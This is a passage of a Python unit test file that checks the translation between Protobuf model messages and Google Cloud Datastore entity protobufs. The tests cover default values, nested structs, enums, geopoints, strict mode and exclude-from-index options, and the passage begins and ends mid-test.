self.assertEqual(sorted(entity_pb_native.SerializePartialToString()),\n sorted(entity_pb_translated.SerializePartialToString()))\n\n # Serializing object with all values set to default values should result in the same\n # end result as serializing an empty object where implicit default values are used\n example_pb_empty = example_pb2.ExampleDBModel()\n entity_pb_empty_translated = model_pb_to_entity_pb(model_pb=example_pb_empty)\n\n self.assertEqual(entity_pb_empty_translated, entity_pb_translated)\n self.assertEqual(entity_pb_empty_translated, entity_pb_native)\n\n # Test a scenario using exclude_falsy_values=True. 
All the default falsy values\n # should be excluded.\n example_pb_empty = example_pb2.ExampleDBModel()\n entity_pb_empty_translated = model_pb_to_entity_pb(model_pb=example_pb_empty,\n exclude_falsy_values=True)\n\n entity = datastore.Entity()\n entity_pb_native = datastore.helpers.entity_to_protobuf(entity)\n\n self.assertEqual(entity_pb_empty_translated, entity_pb_native)\n\n def test_translate_model_partially_populated(self):\n # type: () -> None\n # Test scenario where only a single field on the model is populated\n example_pb = example_pb2.ExampleDBModel()\n example_pb.int32_key = 555\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEqual(entity_pb_serialized.properties['int32_key'].integer_value, 555)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'int32_key')\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.string_key = 'some string value'\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'string_key')\n self.assertEqual(entity_pb_serialized.properties['string_key'].string_value,\n 'some string value')\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.bool_key = True\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'bool_key')\n self.assertEqual(entity_pb_serialized.properties['bool_key'].boolean_value, True)\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.bytes_key = b'abcdefg'\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'bytes_key')\n self.assertEqual(entity_pb_serialized.properties['bytes_key'].blob_value, b'abcdefg')\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.double_key = 123.456\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'double_key')\n self.assertEqual(entity_pb_serialized.properties['double_key'].double_value,\n 123.456)\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.float_key = 456.78900146484375\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'float_key')\n self.assertEqual(entity_pb_serialized.properties['float_key'].double_value,\n 456.78900146484375)\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.int64_key = 1000000000\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'int64_key')\n self.assertEqual(entity_pb_serialized.properties['int64_key'].integer_value, 1000000000)\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.enum_key = 2 # type: ignore\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'enum_key')\n self.assertEqual(entity_pb_serialized.properties['enum_key'].integer_value, 2)\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.string_array_key.append('value1')\n example_pb.string_array_key.append('value2')\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n 
self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'string_array_key')\n self.assertEqual(\n len(entity_pb_serialized.properties['string_array_key'].array_value.values),\n 2)\n self.assertEqual(\n entity_pb_serialized.properties['string_array_key'].array_value.values[0]\n .string_value,\n 'value1')\n self.assertEqual(\n entity_pb_serialized.properties['string_array_key'].array_value.values[1]\n .string_value,\n 'value2')\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.int32_array_key.append(1111)\n example_pb.int32_array_key.append(2222)\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized, 'int32_array_key')\n self.assertEqual(len(entity_pb_serialized.properties['int32_array_key'].array_value.values),\n 2)\n self.assertEqual(\n entity_pb_serialized.properties['int32_array_key'].array_value.values[0].integer_value,\n 1111)\n self.assertEqual(\n entity_pb_serialized.properties['int32_array_key'].array_value.values[1].integer_value,\n 2222)\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.map_string_string['key1'] = 'value1'\n example_pb.map_string_string['key2'] = 'value2'\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized,\n 'map_string_string')\n self.assertEqual(\n entity_pb_serialized.properties['map_string_string'].entity_value\n .properties['key1'].string_value,\n 'value1')\n self.assertEqual(entity_pb_serialized.properties['map_string_string'].entity_value\n .properties['key2'].string_value,\n 'value2')\n\n geo_point_value = latlng_pb2.LatLng(latitude=-20.2, longitude=+160.5)\n\n example_pb = example_pb2.ExampleDBModel()\n example_pb.geo_point_key.CopyFrom(geo_point_value)\n\n entity_pb_serialized = model_pb_to_entity_pb(model_pb=example_pb, exclude_falsy_values=True)\n self.assertEntityPbHasPopulatedField(entity_pb_serialized,\n 'geo_point_key')\n self.assertEqual(entity_pb_serialized.properties['geo_point_key'].geo_point_value.latitude,\n -20.2)\n self.assertEqual(entity_pb_serialized.properties['geo_point_key'].geo_point_value.longitude,\n +160.5)\n\n def test_model_pb_with_key_to_entity_pb(self):\n # type: () -> None\n client = datastore.Client(credentials=EmulatorCreds(), _http=requests.Session(),\n namespace='namespace1', project='project1')\n\n example_pb = example_pb2.ExampleDBModelWithKey()\n example_pb.key = 'primary_key_one'\n example_pb.string_key = 'value'\n example_pb.int32_key = 100\n\n entity_pb_translated = model_pb_with_key_to_entity_pb(client=client, model_pb=example_pb)\n\n self.assertEqual(entity_pb_translated.key.partition_id.namespace_id, 'namespace1')\n self.assertEqual(entity_pb_translated.key.partition_id.project_id, 'project1')\n self.assertEqual(entity_pb_translated.key.path[0].kind, 'ExampleDBModelWithKey')\n self.assertEqual(entity_pb_translated.key.path[0].name, 'primary_key_one')\n self.assertEqual(entity_pb_translated.properties['string_key'].string_value, 'value')\n self.assertEqual(entity_pb_translated.properties['int32_key'].integer_value, 100)\n\n def test_model_pb_to_entity_pb_invalid_argument_type(self):\n # type: () -> None\n class Invalid(object):\n pass\n\n example_pb = Invalid()\n\n expected_msg = 'model_pb argument is not a valid Protobuf class instance'\n self.assertRaisesRegexp(ValueError, expected_msg, model_pb_to_entity_pb,\n example_pb) # type: ignore\n\n def 
test_model_pb_with_key_to_entity_pb_invalid_argument_type(self):\n # type: () -> None\n class Invalid(object):\n pass\n\n client = datastore.Client(credentials=EmulatorCreds(), _http=requests.Session(),\n namespace='namespace1', project='project1')\n example_pb = Invalid()\n\n expected_msg = 'model_pb argument is not a valid Protobuf class instance'\n self.assertRaisesRegexp(ValueError, expected_msg, model_pb_with_key_to_entity_pb, client,\n example_pb)\n\n def test_entity_pb_to_model_pb_strict_mode(self):\n # type: () -> None\n\n entity_pb = entity_pb2.Entity()\n entity_native = datastore.Entity()\n entity_native.update({'string_key': 'test value', 'int32_key': 20, 'non_valid_key': 'bar'})\n entity_pb = datastore.helpers.entity_to_protobuf(entity_native)\n\n # 1. Not using strict mode. Field which is available on the Entity object, but not model\n # object should be ignored\n example_pb = entity_pb_to_model_pb(example_pb2.ExampleDBModel, entity_pb)\n\n self.assertEqual(example_pb.string_key, 'test value')\n self.assertEqual(example_pb.int32_key, 20)\n self.assertEqual(example_pb.int32_key, 20)\n self.assertRaises(AttributeError, getattr, example_pb, 'non_valid_key')\n\n example_pb = entity_pb_to_model_pb(example_pb2.ExampleDBModel, entity_pb,\n strict=False)\n\n self.assertEqual(example_pb.string_key, 'test value')\n self.assertEqual(example_pb.int32_key, 20)\n self.assertRaises(AttributeError, getattr, example_pb, 'non_valid_key')\n\n # 2. Using strict mode, exception should be thrown\n expected_msg = ('Database object contains field \"non_valid_key\" which is not defined on '\n 'the database model class \"ExampleDBModel\"')\n self.assertRaisesRegexp(ValueError, expected_msg, entity_pb_to_model_pb,\n example_pb2.ExampleDBModel, entity_pb, strict=True)\n\n def test_entity_pb_to_model_pb_null_type(self):\n entity_pb = entity_pb2.Entity()\n null_value = entity_pb.properties.get_or_create('null_key')\n null_value.null_value = 0\n\n model_pb = entity_pb_to_model_pb(example_pb2.ExampleDBModel, entity_pb)\n self.assertEqual(model_pb.null_key, 0)\n\n entity_pb = entity_pb2.Entity()\n null_value = entity_pb.properties.get_or_create('null_key')\n null_value.null_value = 1\n\n model_pb = entity_pb_to_model_pb(example_pb2.ExampleDBModel, entity_pb)\n self.assertEqual(model_pb.null_key, 0)\n\n def test_entity_pb_to_model_pb_geopoint_type(self):\n entity_pb = entity_pb2.Entity()\n\n latlng_value = latlng_pb2.LatLng(latitude=-20.2, longitude=+160.5)\n\n geo_point_value = entity_pb.properties.get_or_create('geo_point_key')\n geo_point_value.geo_point_value.CopyFrom(latlng_value)\n\n model_pb = entity_pb_to_model_pb(example_pb2.ExampleDBModel, entity_pb)\n self.assertEqual(model_pb.geo_point_key.latitude, -20.2)\n self.assertEqual(model_pb.geo_point_key.longitude, +160.5)\n\n latlng_value = latlng_pb2.LatLng(latitude=0.0, longitude=0.0)\n\n geo_point_value = entity_pb.properties.get_or_create('geo_point_key')\n geo_point_value.geo_point_value.CopyFrom(latlng_value)\n\n model_pb = entity_pb_to_model_pb(example_pb2.ExampleDBModel, entity_pb)\n self.assertEqual(model_pb.geo_point_key.latitude, 0.0)\n self.assertEqual(model_pb.geo_point_key.longitude, 0.0)\n\n def test_model_pb_to_entity_pb_referenced_type(self):\n # Test a scenario where model pb references a type from another protobuf file\n example_referenced_type_pb = example2_pb2.ExampleReferencedType()\n example_referenced_type_pb.key_1 = 'value 1'\n example_referenced_type_pb.key_2 = 'value 2'\n\n entity_pb_translated = 
model_pb_to_entity_pb(model_pb=example_referenced_type_pb)\n self.assertEqual(entity_pb_translated.properties['key_1'].string_value, 'value 1')\n self.assertEqual(entity_pb_translated.properties['key_2'].string_value, 'value 2')\n\n example_with_package_referenced_type_pb = example3_pb2.ExampleWithPackageDBModel()\n example_with_package_referenced_type_pb.string_key = 'value 4'\n\n entity_pb_translated = model_pb_to_entity_pb(\n model_pb=example_with_package_referenced_type_pb)\n self.assertEqual(entity_pb_translated.properties['string_key'].string_value, 'value 4')\n\n example_with_referenced_type_pb = example_pb2.ExampleWithReferencedTypeDBModel()\n example_with_referenced_type_pb.string_key = 'value 3'\n example_with_referenced_type_pb.referenced_enum = example2_pb2.ExampleReferencedEnum.KEY1\n example_with_referenced_type_pb.referenced_type_key.CopyFrom(example_referenced_type_pb)\n example_with_referenced_type_pb.referenced_package_type_key.CopyFrom(\n example_with_package_referenced_type_pb)\n\n example_with_nested_struct_db_model_pb = example_pb2.ExampleWithNestedStructDBModel()\n example_with_nested_struct_db_model_pb.struct_key.update({'foo': 'bar', 'bar': 'baz',\n 'bool1': True, 'bool2': False,\n 'number1': 100, 'number2': 22.33})\n\n example_with_referenced_type_pb.referenced_struct_key.CopyFrom(\n example_with_nested_struct_db_model_pb)\n\n entity_pb_translated = model_pb_to_entity_pb(model_pb=example_with_referenced_type_pb)\n self.assertEqual(entity_pb_translated.properties['string_key'].string_value, 'value 3')\n self.assertEqual(entity_pb_translated.properties['referenced_enum'].integer_value, 1)\n self.assertEqual(entity_pb_translated.properties['referenced_type_key'].entity_value.\n properties['key_1'].string_value,\n 'value 1')\n self.assertEqual(entity_pb_translated.properties['referenced_type_key'].entity_value.\n properties['key_2'].string_value,\n 'value 2')\n self.assertEqual(entity_pb_translated.properties['referenced_package_type_key'].\n entity_value.properties['string_key'].string_value,\n 'value 4')\n self.assertEqual(entity_pb_translated.properties['referenced_struct_key'].entity_value\n .properties['struct_key'].entity_value.properties['foo'].string_value,\n 'bar')\n self.assertEqual(entity_pb_translated.properties['referenced_struct_key'].entity_value\n .properties['struct_key'].entity_value.properties['bar'].string_value,\n 'baz')\n self.assertEqual(entity_pb_translated.properties['referenced_struct_key'].entity_value\n .properties['struct_key'].entity_value.properties['bool1'].boolean_value,\n True)\n self.assertEqual(entity_pb_translated.properties['referenced_struct_key'].entity_value\n .properties['struct_key'].entity_value.properties['bool2'].boolean_value,\n False)\n\n # Perform the round trip, translate it back to the model and verity it matches the original\n # input\n model_pb_round_trip = entity_pb_to_model_pb(example_pb2.ExampleWithReferencedTypeDBModel,\n entity_pb_translated)\n self.assertEqual(model_pb_round_trip, example_with_referenced_type_pb)\n\n def test_model_pb_to_entity_pb_nested_struct_roundtrip(self):\n # type: () -> None\n example_data = {\n 'key1': u'val1',\n 'key2': 2,\n 'key3': [1, 2, 3],\n 'key4': u'čđć',\n 'key5': {\n 'dict_key_1': u'1',\n 'dict_key_2': 30,\n 'dict_key_3': [u'a', u'b', u'c', 3,\n {u'f': u'h', u'm': [20, 30, 40], u'g': {u'foo': u'bar'}}],\n 'dict_key_4': {u'1': 1.1, u'2': 2.2, u'3': 3.33}\n\n }\n }\n\n example_pb = example_pb2.ExampleWithNestedStructDBModel()\n example_pb.struct_key.update(example_data)\n 
entity_pb_translated = model_pb_to_entity_pb(model_pb=example_pb)\n\n # Verify that the both Protobuf objects are the same (translated one and the datastore\n # native one)\n\n # NOTE: We cast any number inside the dictionary to double to work around the bug in\n # \"entity_to_protobuf\" not handling numbers inside structs correctly\n example_data = self._int_to_double(example_data)\n entity = datastore.Entity()\n entity.update({'struct_key': example_data})\n\n entity_pb_native = datastore.helpers.entity_to_protobuf(entity)\n\n self.assertEqual(repr(entity_pb_native), repr(entity_pb_translated))\n self.assertEqual(entity_pb_translated, entity_pb_native)\n self.assertEqual(sorted(entity_pb_native.SerializePartialToString()),\n sorted(entity_pb_translated.SerializePartialToString()))\n\n # Try converting it back to the original Protobuf object and verify it matches the input\n example_pb_converted = entity_pb_to_model_pb(example_pb2.ExampleWithNestedStructDBModel,\n entity_pb_translated)\n self.assertEqual(example_pb_converted, example_pb)\n self.assertEqual(sorted(example_pb_converted.SerializePartialToString()),\n sorted(example_pb.SerializePartialToString()))\n\n def test_model_pb_to_entity_pb_repeated_referenced_field_with_enum_field(self):\n # type: () -> None\n # Test a scenario where a repeated field references a nested type which contains an ENUM\n # and ensure that default enum value (0) is correctly set either when it's explicitly\n # provided or when it's not provided and a default value is used.\n example_pb = example_pb2.ExampleDBModel()\n\n example_placeholder_pb1 = example_pb2.ExampleNestedModel(string_key=u'value 1',\n int32_key=12345)\n example_placeholder_pb1.enum_key = example_pb2.ExampleEnumModel.ENUM2 # type: ignore\n # Enum with value 0 is explicitly provided\n example_placeholder_pb2 = example_pb2.ExampleNestedModel(string_key=u'value 2',\n int32_key=5000)\n example_placeholder_pb2.enum_key = example_pb2.ExampleEnumModel.ENUM0 # type: ignore\n # Enum value is not provided, default value 0 should be used\n example_placeholder_pb3 = example_pb2.ExampleNestedModel(string_key=u'value 3',\n int32_key=40)\n\n example_pb.complex_array_key.append(example_placeholder_pb1) # type: ignore\n example_pb.complex_array_key.append(example_placeholder_pb2) # type: ignore\n example_pb.complex_array_key.append(example_placeholder_pb3) # type: ignore\n\n self.assertEqual(example_pb.complex_array_key[0].enum_key, 2)\n self.assertEqual(example_pb.complex_array_key[1].enum_key, 0)\n self.assertEqual(example_pb.complex_array_key[2].enum_key, 0)\n\n # Serialize it and ensure \"0\" enum values are included\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb)\n self.assertEqual(len(entity_pb.properties['complex_array_key'].array_value.values), 3)\n self.assertEqual(entity_pb.properties['complex_array_key'].array_value.values[0]\n .entity_value.properties['enum_key'].integer_value,\n example_pb2.ExampleEnumModel.ENUM2)\n self.assertEqual(entity_pb.properties['complex_array_key'].array_value.values[1]\n .entity_value.properties['enum_key'].integer_value,\n example_pb2.ExampleEnumModel.ENUM0)\n self.assertEqual(entity_pb.properties['complex_array_key'].array_value.values[2]\n .entity_value.properties['enum_key'].integer_value,\n example_pb2.ExampleEnumModel.ENUM0)\n\n def test_model_pb_to_entity_pb_exclude_from_index_fields(self):\n # type: () -> None\n example_pb = example_pb2.ExampleDBModel()\n example_pb.int32_key = 100\n example_pb.string_key = 'string bar'\n example_pb.bytes_key = 
b'foobarbytes'\n example_pb.enum_key = 1 # type: ignore\n\n # No exclude from index provided\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb)\n\n for field_name in ['int32_key', 'string_key', 'bytes_key', 'enum_key']:\n self.assertFalse(entity_pb.properties[field_name].exclude_from_indexes)\n\n # Exclude from index provided for some fields\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb,\n exclude_from_index=['int32_key', 'bytes_key'])\n\n for field_name in ['int32_key', 'bytes_key']:\n self.assertTrue(entity_pb.properties[field_name].exclude_from_indexes)\n\n for field_name in ['string_key', 'enum_key']:\n self.assertFalse(entity_pb.properties[field_name].exclude_from_indexes)\n\n def test_model_pb_to_entity_pb_struct_field_null_value(self):\n example_pb = example_pb2.ExampleDBModel()\n example_pb.struct_key.update({\n 'key1': None,\n 'key2': [None, None],\n 'key3': {'a': None}\n })\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb)\n\n self.assertEqual(entity_pb.properties['struct_key'].entity_value\n .properties['key1'].null_value, struct_pb2.NULL_VALUE)\n self.assertEqual(entity_pb.properties['struct_key'].entity_value.\n properties['key2'].array_value.values[0].null_value,\n struct_pb2.NULL_VALUE)\n self.assertEqual(entity_pb.properties['struct_key'].entity_value.\n properties['key2'].array_value.values[1].null_value,\n struct_pb2.NULL_VALUE)\n self.assertEqual(entity_pb.properties['struct_key'].entity_value.\n properties['key3'].entity_value.properties['a'].null_value,\n struct_pb2.NULL_VALUE)\n\n def test_model_pb_to_entity_pb_exclude_from_index_custom_extension_model_without_package(self):\n # type: () -> None\n from tests.generated import example_with_options_pb2\n\n # Multiple fields excluded from index\n model_pb1 = example_with_options_pb2.ExampleDBModelWithOptions1()\n model_pb1.string_key_one = 'one'\n model_pb1.string_key_two = 'two'\n model_pb1.string_key_three = 'three'\n model_pb1.string_key_four = 'four'\n model_pb1.int32_field_one = 111\n model_pb1.int32_field_two = 222\n\n entity_pb1 = model_pb_to_entity_pb(model_pb=model_pb1)\n\n self.assertEqual(entity_pb1.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb1.properties['string_key_one'].exclude_from_indexes, True)\n self.assertEqual(entity_pb1.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb1.properties['string_key_three'].exclude_from_indexes, True)\n self.assertEqual(entity_pb1.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb1.properties['int32_field_two'].exclude_from_indexes, True)\n\n self.assertEqual(entity_pb1.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb1.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb1.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb1.properties['string_key_four'].exclude_from_indexes, False)\n self.assertEqual(entity_pb1.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb1.properties['int32_field_one'].exclude_from_indexes, False)\n\n # One field excluded from index, other doesn't exist (should be simply ignored)\n model_pb2 = example_with_options_pb2.ExampleDBModelWithOptions2()\n model_pb2.string_key_one = 'one'\n model_pb2.string_key_two = 'two'\n model_pb2.string_key_three = 'three'\n model_pb2.string_key_four = 'four'\n model_pb2.int32_field_one = 111\n model_pb2.int32_field_two = 222\n\n entity_pb2 = model_pb_to_entity_pb(model_pb=model_pb2)\n\n 
self.assertEqual(entity_pb2.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb2.properties['int32_field_two'].exclude_from_indexes, True)\n\n self.assertEqual(entity_pb2.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb2.properties['string_key_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb2.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb2.properties['string_key_three'].exclude_from_indexes, False)\n self.assertEqual(entity_pb2.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb2.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb2.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb2.properties['string_key_four'].exclude_from_indexes, False)\n self.assertEqual(entity_pb2.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb2.properties['int32_field_one'].exclude_from_indexes, False)\n\n # No fields excluded from index\n model_pb3 = example_with_options_pb2.ExampleDBModelWithOptions3()\n model_pb3.string_key_one = 'one'\n model_pb3.string_key_two = 'two'\n model_pb3.string_key_three = 'three'\n model_pb3.string_key_four = 'four'\n model_pb3.int32_field_one = 111\n model_pb3.int32_field_two = 222\n\n entity_pb3 = model_pb_to_entity_pb(model_pb=model_pb3)\n\n self.assertEqual(entity_pb3.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb3.properties['string_key_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb3.properties['string_key_three'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb3.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb3.properties['string_key_four'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb3.properties['int32_field_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb3.properties['int32_field_two'].exclude_from_indexes, False)\n\n # exclude_from_index function argument provided, this has precedence over fields defined on\n # the model\n # Multiple fields excluded from index\n model_pb4 = example_with_options_pb2.ExampleDBModelWithOptions1()\n model_pb4.string_key_one = 'one'\n model_pb4.string_key_two = 'two'\n model_pb4.string_key_three = 'three'\n model_pb4.string_key_four = 'four'\n model_pb4.int32_field_one = 111\n model_pb4.int32_field_two = 222\n\n entity_pb4 = model_pb_to_entity_pb(model_pb=model_pb4,\n exclude_from_index=['string_key_four'])\n\n self.assertEqual(entity_pb4.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb4.properties['string_key_four'].exclude_from_indexes, True)\n\n self.assertEqual(entity_pb4.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb4.properties['string_key_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb4.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb4.properties['string_key_three'].exclude_from_indexes, False)\n self.assertEqual(entity_pb4.properties['string_key_two'].string_value, 'two')\n 
self.assertEqual(entity_pb4.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb4.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb4.properties['int32_field_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb4.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb4.properties['int32_field_two'].exclude_from_indexes, False)\n\n def test_model_pb_to_entity_pb_exclude_from_index_custom_extension_model_with_package(self):\n # type: () -> None\n from tests.generated.models import example_with_options_pb2\n\n # Verify it also works correctly for model protobuf files which define \"package\" option\n # Multiple fields excluded from index\n model_pb1 = example_with_options_pb2.ExampleDBModelWithOptions1()\n model_pb1.string_key_one = 'one'\n model_pb1.string_key_two = 'two'\n model_pb1.string_key_three = 'three'\n model_pb1.string_key_four = 'four'\n model_pb1.int32_field_one = 111\n model_pb1.int32_field_two = 222\n\n entity_pb1 = model_pb_to_entity_pb(model_pb=model_pb1)\n\n self.assertEqual(entity_pb1.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb1.properties['string_key_one'].exclude_from_indexes, True)\n self.assertEqual(entity_pb1.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb1.properties['string_key_three'].exclude_from_indexes, True)\n self.assertEqual(entity_pb1.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb1.properties['int32_field_two'].exclude_from_indexes, True)\n\n self.assertEqual(entity_pb1.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb1.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb1.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb1.properties['string_key_four'].exclude_from_indexes, False)\n self.assertEqual(entity_pb1.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb1.properties['int32_field_one'].exclude_from_indexes, False)\n\n # One field excluded from index, other doesn't exist (should be simply ignored)\n model_pb2 = example_with_options_pb2.ExampleDBModelWithOptions2()\n model_pb2.string_key_one = 'one'\n model_pb2.string_key_two = 'two'\n model_pb2.string_key_three = 'three'\n model_pb2.string_key_four = 'four'\n model_pb2.int32_field_one = 111\n model_pb2.int32_field_two = 222\n\n entity_pb2 = model_pb_to_entity_pb(model_pb=model_pb2)\n\n self.assertEqual(entity_pb2.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb2.properties['int32_field_two'].exclude_from_indexes, True)\n\n self.assertEqual(entity_pb2.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb2.properties['string_key_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb2.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb2.properties['string_key_three'].exclude_from_indexes, False)\n self.assertEqual(entity_pb2.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb2.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb2.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb2.properties['string_key_four'].exclude_from_indexes, False)\n self.assertEqual(entity_pb2.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb2.properties['int32_field_one'].exclude_from_indexes, False)\n\n # No 
fields excluded from index\n model_pb3 = example_with_options_pb2.ExampleDBModelWithOptions3()\n model_pb3.string_key_one = 'one'\n model_pb3.string_key_two = 'two'\n model_pb3.string_key_three = 'three'\n model_pb3.string_key_four = 'four'\n model_pb3.int32_field_one = 111\n model_pb3.int32_field_two = 222\n\n entity_pb3 = model_pb_to_entity_pb(model_pb=model_pb3)\n\n self.assertEqual(entity_pb3.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb3.properties['string_key_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb3.properties['string_key_three'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb3.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb3.properties['string_key_four'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb3.properties['int32_field_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb3.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb3.properties['int32_field_two'].exclude_from_indexes, False)\n\n # exclude_from_index function argument provided, this has precedence over fields defined on\n # the model\n # Multiple fields excluded from index\n model_pb4 = example_with_options_pb2.ExampleDBModelWithOptions1()\n model_pb4.string_key_one = 'one'\n model_pb4.string_key_two = 'two'\n model_pb4.string_key_three = 'three'\n model_pb4.string_key_four = 'four'\n model_pb4.int32_field_one = 111\n model_pb4.int32_field_two = 222\n\n entity_pb4 = model_pb_to_entity_pb(model_pb=model_pb4,\n exclude_from_index=['string_key_four'])\n\n self.assertEqual(entity_pb4.properties['string_key_four'].string_value, 'four')\n self.assertEqual(entity_pb4.properties['string_key_four'].exclude_from_indexes, True)\n\n self.assertEqual(entity_pb4.properties['string_key_one'].string_value, 'one')\n self.assertEqual(entity_pb4.properties['string_key_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb4.properties['string_key_three'].string_value, 'three')\n self.assertEqual(entity_pb4.properties['string_key_three'].exclude_from_indexes, False)\n self.assertEqual(entity_pb4.properties['string_key_two'].string_value, 'two')\n self.assertEqual(entity_pb4.properties['string_key_two'].exclude_from_indexes, False)\n self.assertEqual(entity_pb4.properties['int32_field_one'].integer_value, 111)\n self.assertEqual(entity_pb4.properties['int32_field_one'].exclude_from_indexes, False)\n self.assertEqual(entity_pb4.properties['int32_field_two'].integer_value, 222)\n self.assertEqual(entity_pb4.properties['int32_field_two'].exclude_from_indexes, False)\n\n def test_model_pb_to_entity_pb_exclude_from_index_custom_extension_multiple_options(self):\n # type: () -> None\n # Test a scenario where field has another custom option defined, in addition to\n # exclude_from_index (other option should be simply ignored and not affect the behavior\n # in any way)\n from tests.generated import example_with_options_pb2\n\n # Multiple fields excluded from index\n model_pb1 = example_with_options_pb2.ExampleDBModelWithMultipleOptions()\n model_pb1.string_key_one = 'one'\n model_pb1.string_key_two = 'two'\n model_pb1.string_key_three = 'three'\n 
